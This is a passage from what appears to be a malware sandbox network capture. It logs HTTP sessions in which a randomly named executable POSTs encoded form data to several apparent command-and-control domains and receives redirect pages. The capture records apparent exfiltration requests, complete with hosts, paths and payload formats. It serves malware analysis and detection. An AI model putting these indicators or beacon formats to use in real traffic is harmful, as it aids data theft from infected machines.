                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.bidiez.com
                                                                                                                            Referer: http://www.bidiez.com/puvv/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 65 39 6a 6e 44 78 42 7a 70 56 36 33 45 34 31 6f 4e 43 41 34 4a 57 30 74 38 66 54 71 4f 41 62 4f 46 31 43 43 74 47 55 56 4a 4f 53 71 59 64 6c 66 44 30 34 52 77 4b 43 4d 71 41 74 6c 7a 59 5a 39 6d 68 31 59 78 76 7a 44 76 75 43 69 32 6e 37 6f 66 6e 6c 56 2f 75 4e 33 4d 53 68 6f 65 30 64 50 48 4a 36 33 2f 4a 52 6c 37 66 30 6f 56 61 58 2b 63 44 6c 6f 43 62 52 78 32 2f 30 4d 59 61 4a 31 54 37 6e 42 45 43 61 4a 33 6c 57 59 53 71 45 4b 4f 49 62 4e 74 68 72 48 35 46 39 39 54 52 4f 69 62 30 73 42 51 53 35 79 62 78 53 58 2f 37 2f 34 4b 50 4d 6d 64 6f 75 4a 48 77 65 36 44 44 66 39 30 51 3d 3d
                                                                                                                            Data Ascii: 2BWDG=e9jnDxBzpV63E41oNCA4JW0t8fTqOAbOF1CCtGUVJOSqYdlfD04RwKCMqAtlzYZ9mh1YxvzDvuCi2n7ofnlV/uN3MShoe0dPHJ63/JRl7f0oVaX+cDloCbRx2/0MYaJ1T7nBECaJ3lWYSqEKOIbNthrH5F99TROib0sBQS5ybxSX/7/4KPMmdouJHwe6DDf90Q==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            34192.168.2.4500413.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:10.535514116 CEST877OUTPOST /puvv/ HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.bidiez.com
                                                                                                                            Referer: http://www.bidiez.com/puvv/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 65 39 6a 6e 44 78 42 7a 70 56 36 33 46 59 46 6f 4d 68 59 34 50 32 30 73 32 2f 54 71 45 67 62 4b 46 31 2b 43 74 44 31 4f 4b 38 32 71 5a 2f 39 66 43 31 34 52 39 71 43 4d 79 51 74 67 33 59 5a 32 6d 6d 39 6d 78 75 50 44 76 71 71 69 32 6e 4c 6f 65 55 4e 57 2b 2b 4e 31 48 79 68 71 52 55 64 50 48 4a 36 33 2f 4a 45 34 37 66 63 6f 56 71 48 2b 54 43 6c 70 65 4c 52 32 78 2f 30 4d 63 61 4a 35 54 37 6e 76 45 44 47 7a 33 6e 2b 59 53 6f 63 4b 4f 38 50 53 30 52 71 74 6b 56 38 39 43 44 7a 6f 62 45 4a 39 54 52 45 64 59 43 2b 4d 2b 39 75 69 62 2b 74 78 50 6f 4b 36 61 33 58 4f 4f 41 69 30 76 5a 68 75 2b 74 48 4a 73 34 59 59 6f 4e 5a 72 52 77 51 2b 66 70 4d 3d
                                                                                                                            Data Ascii: 2BWDG=e9jnDxBzpV63FYFoMhY4P20s2/TqEgbKF1+CtD1OK82qZ/9fC14R9qCMyQtg3YZ2mm9mxuPDvqqi2nLoeUNW++N1HyhqRUdPHJ63/JE47fcoVqH+TClpeLR2x/0McaJ5T7nvEDGz3n+YSocKO8PS0RqtkV89CDzobEJ9TREdYC+M+9uib+txPoK6a3XOOAi0vZhu+tHJs4YYoNZrRwQ+fpM=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.2.4500423.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:13.087300062 CEST10959OUTPOST /puvv/ HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.bidiez.com
                                                                                                                            Referer: http://www.bidiez.com/puvv/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 65 39 6a 6e 44 78 42 7a 70 56 36 33 46 59 46 6f 4d 68 59 34 50 32 30 73 32 2f 54 71 45 67 62 4b 46 31 2b 43 74 44 31 4f 4b 38 2b 71 59 4f 64 66 44 57 51 52 79 4b 43 4d 36 77 74 68 33 59 5a 33 6d 67 56 69 78 75 44 31 76 6f 53 69 33 47 72 6f 4b 78 78 57 77 2b 4e 31 49 53 68 72 65 30 64 67 48 4a 72 2f 2f 4a 55 34 37 66 63 6f 56 73 44 2b 55 54 6c 70 63 4c 52 78 32 2f 30 49 59 61 49 75 54 37 2f 5a 45 44 7a 45 32 58 65 59 54 49 4d 4b 4d 76 6e 53 72 68 72 4c 6e 56 38 54 43 44 2f 72 62 45 55 4d 54 51 78 41 59 42 69 4d 39 38 66 42 42 74 45 70 5a 59 69 39 4b 41 50 75 4b 6e 4b 54 71 59 31 35 2f 75 44 47 78 62 56 32 79 73 73 76 56 42 34 6b 4b 75 57 71 58 66 68 54 39 74 43 64 55 61 6e 32 74 44 37 6e 46 46 55 55 68 7a 33 2b 2b 45 45 68 46 4d 64 37 78 62 4a 78 56 37 34 6e 47 6d 7a 38 4a 31 46 4b 78 41 6f 39 64 48 55 44 73 67 64 76 46 48 45 70 49 6a 44 73 73 6a 39 52 45 38 44 38 46 32 6e 38 43 69 68 62 30 36 74 76 39 4b 31 71 2f 36 44 57 47 6d 69 66 4b 4b 63 72 62 64 4f 4e 7a 4d 41 55 4f 31 49 53 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=e9jnDxBzpV63FYFoMhY4P20s2/TqEgbKF1+CtD1OK8+qYOdfDWQRyKCM6wth3YZ3mgVixuD1voSi3GroKxxWw+N1IShre0dgHJr//JU47fcoVsD+UTlpcLRx2/0IYaIuT7/ZEDzE2XeYTIMKMvnSrhrLnV8TCD/rbEUMTQxAYBiM98fBBtEpZYi9KAPuKnKTqY15/uDGxbV2yssvVB4kKuWqXfhT9tCdUan2tD7nFFUUhz3++EEhFMd7xbJxV74nGmz8J1FKxAo9dHUDsgdvFHEpIjDssj9RE8D8F2n8Cihb06tv9K1q/6DWGmifKKcrbdONzMAUO1ISkxghPsDbBx9EQJvbeXKCJ8wOPMkZlX4PKAQxaoKIjhF/uRM6ju/OQQaGh5IbqH/3vLKK0RsObdg0mix3LLpUBqPetyQO8hxThp6tGmMcgyNmccuDtB2idTOtWC9JRfomezxQocUUPZR72el4YY3oc3bc3+SZRjQ6A7UNfUy0uVFJRyPklBkcCELghwy0uTl79fcHAHutwit5TjUAfARHbtkMMr2m2VOv1WJ+D0CPFxOAWZHS2vL65Lpfko8LNX0wGlBEQZmpxk3wXFMmU8mL9IKYE09+5lgLSYp7syF9DtytxTZyPJi8bwjXNaU7Wl86mLwhQX9ihnTN8UmWrCS0aNsLoE4bb7UTmRraPD3JHpVxBDG8nXfZhjz1hITT7zU2oAY7hOvulCKm/CoFhJgfRoEs6CUVawqe8tEQtmQRADle/VG2lmPavjCp4/Ur8o/f96HvjVks87lj9oMyp13lbmhkaATwd+D5ld9m+MQ94ZDv8ilyC//Tct6djIBgs6J5vcM9Zt2pENG/kYZy04WqRNBQIEeEVKD8pTSGJT63tuPN7j+75mj0lX3fm1tkExV01G38E1TKQ6m6+zi+qIW994Y86m8sonfwSFD2L5blbE+kNCC4w7h6TAbGhWLA62vUTAAEILndSun8yiJ9Z7bA0detxc+fi33SEO [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.2.4500433.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:15.625636101 CEST593OUTGET /puvv/?2BWDG=T/LHAG9D/DKJAY4cGgIDBFFZtM7APAzZIDfepGdmMtSSWfF7Llgex9+86BRulJJgtl8XrMP4vqS7406AXnp/ur5mLgtmNl9eCp3snLA44a4sQebgdSQlBLY=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:59:16.263792038 CEST394INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:16 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 42 57 44 47 3d 54 2f 4c 48 41 47 39 44 2f 44 4b 4a 41 59 34 63 47 67 49 44 42 46 46 5a 74 4d 37 41 50 41 7a 5a 49 44 66 65 70 47 64 6d 4d 74 53 53 57 66 46 37 4c 6c 67 65 78 39 2b 38 36 42 52 75 6c 4a 4a 67 74 6c 38 58 72 4d 50 34 76 71 53 37 34 30 36 41 58 6e 70 2f 75 72 35 6d 4c 67 74 6d 4e 6c 39 65 43 70 33 73 6e 4c 41 34 34 61 34 73 51 65 62 67 64 53 51 6c 42 4c 59 3d 26 77 66 6d 3d 47 36 6f 54 6f 38 76 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=T/LHAG9D/DKJAY4cGgIDBFFZtM7APAzZIDfepGdmMtSSWfF7Llgex9+86BRulJJgtl8XrMP4vqS7406AXnp/ur5mLgtmNl9eCp3snLA44a4sQebgdSQlBLY=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.2.4500443.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:21.323249102 CEST866OUTPOST /tlpb/ HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.deltastem.net
                                                                                                                            Referer: http://www.deltastem.net/tlpb/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 44 62 50 49 53 59 76 34 77 50 6c 4f 7a 44 45 2b 61 62 61 5a 49 62 48 76 78 62 50 57 32 79 6c 55 77 46 37 32 54 76 38 59 45 68 37 79 46 5a 36 6b 66 62 55 47 56 73 2f 67 36 5a 54 5a 4d 74 4a 7a 51 47 6f 58 33 6a 2b 78 6a 59 49 72 56 69 52 62 67 34 6f 4f 76 4c 6f 35 6f 37 50 64 33 71 6a 44 32 72 44 76 70 47 74 5a 53 53 74 68 59 48 44 50 46 37 79 67 70 6e 2b 57 51 64 45 51 75 56 71 52 42 41 57 46 69 57 71 69 69 79 68 4c 5a 48 38 61 33 48 78 35 32 61 61 7a 70 32 42 6a 34 63 47 73 43 77 53 63 69 37 56 66 75 51 46 76 55 6f 62 73 51 6d 37 4b 62 5a 54 53 4b 36 54 53 31 30 30 68 66 77 3d 3d
                                                                                                                            Data Ascii: 2BWDG=DbPISYv4wPlOzDE+abaZIbHvxbPW2ylUwF72Tv8YEh7yFZ6kfbUGVs/g6ZTZMtJzQGoX3j+xjYIrViRbg4oOvLo5o7Pd3qjD2rDvpGtZSSthYHDPF7ygpn+WQdEQuVqRBAWFiWqiiyhLZH8a3Hx52aazp2Bj4cGsCwSci7VfuQFvUobsQm7KbZTSK6TS100hfw==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.2.4500453.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:23.867810011 CEST886OUTPOST /tlpb/ HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.deltastem.net
                                                                                                                            Referer: http://www.deltastem.net/tlpb/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 44 62 50 49 53 59 76 34 77 50 6c 4f 31 6a 30 2b 4a 4d 4f 5a 4f 37 48 67 39 37 50 57 2f 53 6c 51 77 46 6e 32 54 71 51 75 45 30 6a 79 45 38 47 6b 4f 71 55 47 51 73 2f 67 78 35 54 59 43 4e 4a 36 51 47 30 68 33 68 36 78 6a 59 4d 72 56 67 4a 62 67 50 45 4e 75 62 70 66 7a 4c 50 62 35 4b 6a 44 32 72 44 76 70 47 35 6a 53 53 31 68 59 30 4c 50 45 5a 4b 6a 76 58 2b 58 45 4e 45 51 6b 46 71 56 42 41 57 6e 69 58 32 62 69 32 52 4c 5a 47 4d 61 35 32 78 36 2f 61 61 78 74 32 41 44 34 75 6a 47 62 41 4b 58 72 49 4e 72 67 77 77 50 63 4f 4b 32 42 58 61 64 4a 5a 33 68 58 39 61 6d 34 33 4a 6f 45 2f 4e 71 66 65 61 61 67 58 6d 44 69 38 62 49 67 45 62 33 39 6c 6b 3d
                                                                                                                            Data Ascii: 2BWDG=DbPISYv4wPlO1j0+JMOZO7Hg97PW/SlQwFn2TqQuE0jyE8GkOqUGQs/gx5TYCNJ6QG0h3h6xjYMrVgJbgPENubpfzLPb5KjD2rDvpG5jSS1hY0LPEZKjvX+XENEQkFqVBAWniX2bi2RLZGMa52x6/aaxt2AD4ujGbAKXrINrgwwPcOK2BXadJZ3hX9am43JoE/NqfeaagXmDi8bIgEb39lk=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            39192.168.2.4500463.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:26.439686060 CEST10968OUTPOST /tlpb/ HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.deltastem.net
                                                                                                                            Referer: http://www.deltastem.net/tlpb/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 44 62 50 49 53 59 76 34 77 50 6c 4f 31 6a 30 2b 4a 4d 4f 5a 4f 37 48 67 39 37 50 57 2f 53 6c 51 77 46 6e 32 54 71 51 75 45 33 44 79 45 4f 2b 6b 63 35 38 47 54 73 2f 67 74 4a 54 64 43 4e 49 36 51 47 38 39 33 68 32 2b 6a 61 45 72 61 6a 42 62 33 72 51 4e 6b 62 70 66 37 72 50 61 33 71 6a 73 32 72 7a 7a 70 47 70 6a 53 53 31 68 59 31 62 50 53 37 79 6a 30 58 2b 57 51 64 46 43 75 56 71 74 42 41 4f 64 69 58 43 4c 6a 48 74 4c 61 6c 6b 61 37 45 5a 36 77 61 61 33 67 57 41 68 34 75 66 64 62 41 58 75 72 4c 51 2b 67 7a 73 50 66 4a 2f 2f 63 57 32 6a 4c 2f 76 65 54 71 44 43 34 46 4e 51 46 76 64 4c 53 75 36 4f 79 30 57 74 70 2b 32 55 6b 6c 33 68 38 77 78 44 42 54 2b 34 35 58 36 4c 4d 54 50 4a 4b 4e 65 43 6b 78 38 76 31 43 38 58 54 47 39 64 6b 4f 39 36 6e 69 37 77 61 65 77 46 2b 36 2b 37 58 38 48 59 74 34 32 55 30 76 44 5a 62 71 68 54 32 52 78 78 6e 49 4b 32 37 73 52 4d 42 4d 39 4a 67 46 30 53 49 4d 6e 43 69 49 68 59 4b 35 32 67 48 48 67 71 37 59 49 6d 42 31 45 48 4e 43 70 4c 5a 7a 73 52 77 48 76 4b [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=DbPISYv4wPlO1j0+JMOZO7Hg97PW/SlQwFn2TqQuE3DyEO+kc58GTs/gtJTdCNI6QG893h2+jaErajBb3rQNkbpf7rPa3qjs2rzzpGpjSS1hY1bPS7yj0X+WQdFCuVqtBAOdiXCLjHtLalka7EZ6waa3gWAh4ufdbAXurLQ+gzsPfJ//cW2jL/veTqDC4FNQFvdLSu6Oy0Wtp+2Ukl3h8wxDBT+45X6LMTPJKNeCkx8v1C8XTG9dkO96ni7waewF+6+7X8HYt42U0vDZbqhT2RxxnIK27sRMBM9JgF0SIMnCiIhYK52gHHgq7YImB1EHNCpLZzsRwHvKY/uy0OsCz+J+Z/AOo7cV3aP2/73Qk1dzNM7ijzC5COu8S2vktlvEDJ309QVQ7+pKE+l07cA45qdPfqUtwEd+xqSjA62mLQmsB82EfyndlUOAg7P5WWOWyyURnluMyfQ977r+aspU6oAQyffPCJnS9J6v/RIsHHCgrZl4nPumS9E6IAZ8qLDDd5eZbFYUsAO+g8a9Fqf2hEhZ7MXOyYZlhSCTFrfk75dk1qOuMVU9XaeRUjy2JoYN2adT/WW9p5ukbAzLYz2X4Qp6xnIKsMRwa7QaLCwJ9AOshlOIpEKTWUFiZnK4FbLpMecu5mnuRlCg/Zxzq2P0/w8z6VuD4zlmLz13mK0P+3+8MOJ/WxCAd+D5NbXRBjNeeShqQb9SB5nArF42VO/sLBrBSivLgr+Va3t2Nd6P4oMqku+ePve1D/i+zi08WYRQ7TUTIj7aLxj9Xz+7gIz4dx6WU+/mQwLFT8hIAkxSn70S278nCrNgRF/Zxru8iK0V4XCKC+lySuFtCPnLZPgUa94d8BW6BeKTrXgWgpnildeI1CxJ9qunqEDoD2hWlI49cVdKqCVnu7HIc0G5BWNZuL0JzyRejCPvI+2Nmk8OfX9PJJyGNcOq+MoBRX2alh+sjX+ZAOHjOEIORpPa2Re9PSqmvLkBwxXaJtfaeBL8c0OhU0 [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            40192.168.2.4500473.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:29.056119919 CEST596OUTGET /tlpb/?2BWDG=OZnoRuv0v/1Z/CA6HO2FEIDEprX/+1BF8Drjd+I5ZVz3FMGcbqM7cMP28c7FY+8MR3FV1C6ikaATRgc5pZIEy8I+zLLxgcbQl7nSgVZzV1ZQYFDgHJWD22o=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:59:29.646204948 CEST394INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:29 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 42 57 44 47 3d 4f 5a 6e 6f 52 75 76 30 76 2f 31 5a 2f 43 41 36 48 4f 32 46 45 49 44 45 70 72 58 2f 2b 31 42 46 38 44 72 6a 64 2b 49 35 5a 56 7a 33 46 4d 47 63 62 71 4d 37 63 4d 50 32 38 63 37 46 59 2b 38 4d 52 33 46 56 31 43 36 69 6b 61 41 54 52 67 63 35 70 5a 49 45 79 38 49 2b 7a 4c 4c 78 67 63 62 51 6c 37 6e 53 67 56 5a 7a 56 31 5a 51 59 46 44 67 48 4a 57 44 32 32 6f 3d 26 77 66 6d 3d 47 36 6f 54 6f 38 76 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=OZnoRuv0v/1Z/CA6HO2FEIDEprX/+1BF8Drjd+I5ZVz3FMGcbqM7cMP28c7FY+8MR3FV1C6ikaATRgc5pZIEy8I+zLLxgcbQl7nSgVZzV1ZQYFDgHJWD22o=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            41192.168.2.450048129.226.56.200803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:35.653805971 CEST863OUTPOST /170y/ HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.dxfwrc2h.sbs
                                                                                                                            Referer: http://www.dxfwrc2h.sbs/170y/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 46 31 41 59 36 54 4f 67 51 63 71 66 70 72 31 61 31 78 72 45 63 59 70 58 4d 57 62 61 6b 73 72 52 38 36 70 4d 44 6a 48 48 54 7a 55 4c 30 4d 78 6c 50 6d 75 67 65 52 5a 46 32 74 54 2f 77 70 33 59 71 48 46 74 58 70 51 31 57 2f 30 69 53 32 6b 79 37 79 6a 43 4a 62 49 52 4a 4b 77 55 4c 49 66 4e 6c 49 57 4a 6c 33 46 78 56 6c 33 4e 49 67 76 7a 67 45 46 45 5a 42 64 36 43 77 67 34 34 59 45 78 6a 43 44 76 62 33 6c 65 69 37 37 47 65 30 6b 72 4c 59 4b 78 77 30 76 32 49 57 33 74 34 6d 44 46 4b 4a 58 5a 71 58 46 2f 64 52 51 31 4a 72 38 59 2f 4d 43 74 64 39 47 46 33 39 69 43 67 70 35 7a 38 67 3d 3d
                                                                                                                            Data Ascii: 2BWDG=F1AY6TOgQcqfpr1a1xrEcYpXMWbaksrR86pMDjHHTzUL0MxlPmugeRZF2tT/wp3YqHFtXpQ1W/0iS2ky7yjCJbIRJKwULIfNlIWJl3FxVl3NIgvzgEFEZBd6Cwg44YExjCDvb3lei77Ge0krLYKxw0v2IW3t4mDFKJXZqXF/dRQ1Jr8Y/MCtd9GF39iCgp5z8g==
                                                                                                                            Oct 19, 2024 12:59:36.625159025 CEST708INHTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:36 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
